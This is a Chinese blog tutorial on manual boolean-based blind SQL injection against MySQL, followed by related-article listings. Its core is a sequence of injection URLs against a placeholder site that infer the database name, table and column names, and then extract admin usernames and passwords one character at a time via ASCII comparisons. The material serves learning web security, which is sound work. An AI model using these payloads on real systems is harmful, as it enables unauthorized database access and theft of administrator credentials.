布尔盲注手注

最新推荐文章于 2024-07-09 21:13:18 发布
最新推荐文章于 2024-07-09 21:13:18 发布
阅读量339 收藏
点赞数
分类专栏: web渗透 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/103440992
版权

布尔盲注
mid(str,1,3)字符串截取 意思就是把str这个字符串从第一个字符串开始,截取前三个显示
substr()这个函数和上面的用法一样,也是用来截取字符串的
ORD()转换成ascii码
Length()统计长度
version()是查看数据库版本
database()查看当前数据库名
user() 查看当前用户

猜解数据库名字的时候可以使用ORD(mid(database(),1,1))>1这种截取当前数据库的名字的第一个字符将其转换为ascii码来查看,如果不转换为ascii的话,他可能就是字符,数字和特殊字符,太难猜了。

当进行sql注入的时候:
例如www.aaa.com/a.php?id=1,在这个地方进行过测试后,发现这个get型有注入点后,可以使用www.aaa.com/a.php?id=1’ and (length(database()))>5 --,这种来爆破当前数据库名称的长度,例如当>7页面返回正常,>8页面返回不正常,所以当前数据库名称的长度为8。

然后我们就需要去一个个的爆破数据库名称,www.aaa.com/a.php?id=1’ and ascii(substr(database(),1,1))>100来猜测字母,这个测试出来的是第一个字母的ascii的值,www.aaa.com/a.php?id=1’ and ascii(substr(database(),2,1))>100测试的就是第二个字母了。

第三步就是来爆破当前数据库有多少个表,例如www.aaa.com/a.php?id=1’ and (select count(*)from information_schema.tables where table_schema=database())>1–
来猜测表的数量。

当得知表的数量以后我们肯定就要去爆破表的名称,爆破表的名称和上面爆破数据库的名称一样,就是一个个的爆破字母,首先要得知表名的长度,例如www.aaa.com/a.php?id=1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5,limit限制的是我们提取的是第一个表的长度,也就是0的意思,后面1的意思是第一个表的意思。
开始测试第一个表的第一个字母,例如www.aaa.com/a.php?id=1’ and (select ascii (substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)>100 --,然后就是把0换为1就是第二个表的第一个字母开始爆破,然后爆破账号密码都是按照这个模式进行爆破的.

截取当前数据库用户名的第一位字符并返回其ascii值
www.aaa.com/a.php?id=1’and (select ascii(substring((select user()),1,1))=119) –

有了管理表名,下一步就该把该表中的所有字段名都查出来了,依旧是上面的方法
查询’tabl_admin_user’表中的第一个字段名的第一位字符,并返回其对应的ASCII码值,最后确认实际的账号密码字段名分别为’admin_username’,’admin_password’
http://www.aaa.com/a.php?id=1’ and (select ascii(substring((select column_name from information_schema.columns where table_name=0x74626c5f61646d696e5f75736572 limit 0,1),1,1))=97) %23

10,现在管理表名字段名都有了,下一步只需要慢慢把每个字段对应的实际数据查出来即可

获取’admin_username’字段下的第一条记录的第一位字符,并返回其对应的ASCII码值,依次递增,查出完整用户名即可
http://www.aaa.com/a.php?id=1’ and (select ascii(substring((select admin_username from tbl_admin_user limit 0,1),1,1))=119) %23
获取’admin_password’字段下的第一条记录的第一位字符,并返回其对应的ASCII码值,依次递增,查出完整密码数据即可
http:www.aaa.com/a.php?id=1’ and (select ascii(substring((select admin_password from tbl_admin_user limit 0,1),1,1))=49) %23

鸣蜩十四
关注
专栏目录
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
墨者学院布尔盲注(超详细手工和工具)
qq_43355651的博客
09-15 4194
墨者学院的在线靶场中sql注入漏洞测试(布尔盲注),因为不管是时间盲注还是布尔盲注手工的话都需要大量的经历和时间来完成,正好自己最近在学习sql注入盲注,就决定用手工做一次盲注的测试,以便于对sql注入更深刻的理解 温馨提示:此文章基于专门实验的平台下测试,任何人不得随意测试或者注入,互联网不是法外之地,任何除学习之外的事情与作者无关。 首先我们打开墨者学院在线靶场中的sql注入漏洞测试(布尔盲注) 然后找到滚动的字段打开链接寻找注入点 通过测试 and 1=1 and 1=2 之后发现存在注
mysql盲注_Mysql 布尔盲注手工注入详解
weixin_42524100的博客
01-18 558
0x00 什么叫布尔盲注布尔布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。盲注在注入时页面无具体数据返回的注入称之为盲注,一般是通过其他表现形式来判断数据的具体内容布尔盲注页面在执行sql语句后,只会显示两种结果,这时可通过构造逻辑表达式的sql语句来判断数据的具体内容。是不是听的云里雾里的,没关系,继续看0x01 Mysql...
MySQL手注布尔盲注详解
最新发布
m0_52484587的博客
07-09 302
说明存在注入,而且是字符型的注入!(如果是数字型的注入,那么就不用去闭合单引号)但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。这时,我们无法根据应用程序的返回页面得到我们需要的。基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回。说明当前数据库长度为。
sql注入知识---布尔盲注
尘玥的故事
04-08 584
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
SQL Injection (Blind)
angry_program的博客
02-08 484
前言 SQL盲注,即SQL Injection(Blind),与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果(错误回显),而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个为"布尔盲注.py"的Python脚本,...
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库、表、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
sql注入盲注相关知识
weixin_50644728的博客
09-23 6316
1.查数据库长度: ?id=1 or length(database())>7 ?id=1 or length(database())>8 ?id=1 or length(database())=8 通过length函数去猜数据库的长度,最后确认数据库长度为八 2.查数据库 id=1%20or%20substr(database(),1,1) 时间盲注 ...
Java基础-浙大翁恺老师-第六章笔记
kode学习笔记
09-08 546
字符 5.1 字符类型 char是单个的字符,Java使用Unicode来表示字符 Unicode–>可以用来表示汉字内的多种文字 字符可以用来做什么? 字符+数字:每个字符对应一个数字,字符的加减对应于数字的加减,然后输出计算后数字对应的字符 char c = 'A'; c++; System.out.println(c); 两个字符相减,得到在在表格中的距离(int) char e = 'A'; char f = 'D'; System.out.println(e-f); char可
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 392
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表列名。Access只有联合注入和布尔盲注。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
SQL注入盲注布尔、时间)手工注入和半自动化注入
qq_60463414的博客
08-01 1656
SQL注入盲注布尔、时间)手工注入和半自动化注入
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7689
SQL注入-无回显】
Access注入详细笔记
weixin_46007361的博客
10-10 2183
Access注入
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6518
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL注入04】布尔盲注实例手操
Fighting_hawk的博客
02-19 3223
1. 理解布尔注入的判断原理; 2. 掌握布尔盲注的方法。
布尔盲注 python
12-22
布尔盲注是一种常见的网络安全攻击技术,利用用户输入的漏洞来修改数据库查询,从而实现非法访问或者窃取敏感信息。而 Python 是一种强大的编程语言,广泛应用于网络开发领域。 在 Python 中,由于开发者处理用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值